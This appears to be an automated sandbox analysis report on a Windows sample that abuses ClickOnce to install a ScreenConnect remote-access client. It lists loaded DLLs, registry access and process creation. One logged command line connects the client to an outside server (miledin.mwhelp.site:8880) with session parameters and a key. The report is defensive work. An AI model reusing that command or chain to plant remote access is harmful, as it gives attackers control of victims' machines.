                  Reads the System eventlog
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                  System Summary

                  barindex
                  Detected potential unwanted application
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_003AA5E50_2_003AA5E5
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_003A1BD40_2_003A1BD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF9C1A7327D1_2_00007FF9C1A7327D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF9C1AA92611_2_00007FF9C1AA9261
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF9C1A924611_2_00007FF9C1A92461
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF9C1A7D5101_2_00007FF9C1A7D510
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF9C1AABAB81_2_00007FF9C1AABAB8
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF9C1A9ABC51_2_00007FF9C1A9ABC5
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF9C1A85D321_2_00007FF9C1A85D32
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF9C1A9ED2F1_2_00007FF9C1A9ED2F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF9C1A6AF4F1_2_00007FF9C1A6AF4F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF9C1A612111_2_00007FF9C1A61211
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF9C1A831011_2_00007FF9C1A83101
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF9C1A828701_2_00007FF9C1A82870
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF9C1A6F8A11_2_00007FF9C1A6F8A1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF9C1A6F0001_2_00007FF9C1A6F000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF9C1A660501_2_00007FF9C1A66050
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FF9C1A675E88_2_00007FF9C1A675E8
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FF9C1A711D18_2_00007FF9C1A711D1
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FF9C1A714108_2_00007FF9C1A71410
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FF9C1A6FE758_2_00007FF9C1A6FE75
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FF9C1A700D38_2_00007FF9C1A700D3
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FF9C1D532868_2_00007FF9C1D53286
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FF9C1D620588_2_00007FF9C1D62058
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FF9C1D4AFD08_2_00007FF9C1D4AFD0
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FF9C1D547018_2_00007FF9C1D54701
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FF9C1D49E258_2_00007FF9C1D49E25
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7112 -s 748
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engineClassification label: mal54.evad.winEXE@9/70@2/2
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_003A1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_003A1000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\DeploymentJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeMutant created: NULL
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeMutant created: \Sessions\1\BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7112
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6924
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\DeploymentJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCommand line argument: dfshim0_2_003A1000
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCommand line argument: dfshim0_2_003A1000
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeVirustotal: Detection: 16%
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeReversingLabs: Detection: 26%
                  Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe"
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7112 -s 748
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=miledin.mwhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQC1BC7FdVJJFmJKDeQwCiJ3JJNEMl4x59nF7GGtNmjpuazxqDcF4oXznuaF7%2bPvugux9iQl0N%2fv66hQ12W0ZIEMc6tfjE3cMNDEOZODX53g06Q8bUHTzh2x%2f%2b%2bqrAZH38rwy8BEaezwgd3uPlgjgt802V5RYOIginnPSg2QEYJY4zP%2b13deRrkTtsV6UQI5iKxqWvcrjc%2fgnpsbKuxD%2f8jpqy4DtSBRMb9x3urpOt2zfLzMjV0lF10MnyNOj1gz6q1%2bFaQncjp2SQiX%2fLZxsoFe0atFkdojc3UhMzdhfUWSymENjpLdauviud8LLhJxAaEW8KIHkbGfg7iNE6VySqaj&r=&i=" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6924 -s 1312
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=miledin.mwhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQC1BC7FdVJJFmJKDeQwCiJ3JJNEMl4x59nF7GGtNmjpuazxqDcF4oXznuaF7%2bPvugux9iQl0N%2fv66hQ12W0ZIEMc6tfjE3cMNDEOZODX53g06Q8bUHTzh2x%2f%2b%2bqrAZH38rwy8BEaezwgd3uPlgjgt802V5RYOIginnPSg2QEYJY4zP%2b13deRrkTtsV6UQI5iKxqWvcrjc%2fgnpsbKuxD%2f8jpqy4DtSBRMb9x3urpOt2zfLzMjV0lF10MnyNOj1gz6q1%2bFaQncjp2SQiX%2fLZxsoFe0atFkdojc3UhMzdhfUWSymENjpLdauviud8LLhJxAaEW8KIHkbGfg7iNE6VySqaj&r=&i=" "1"Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uiautomationcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
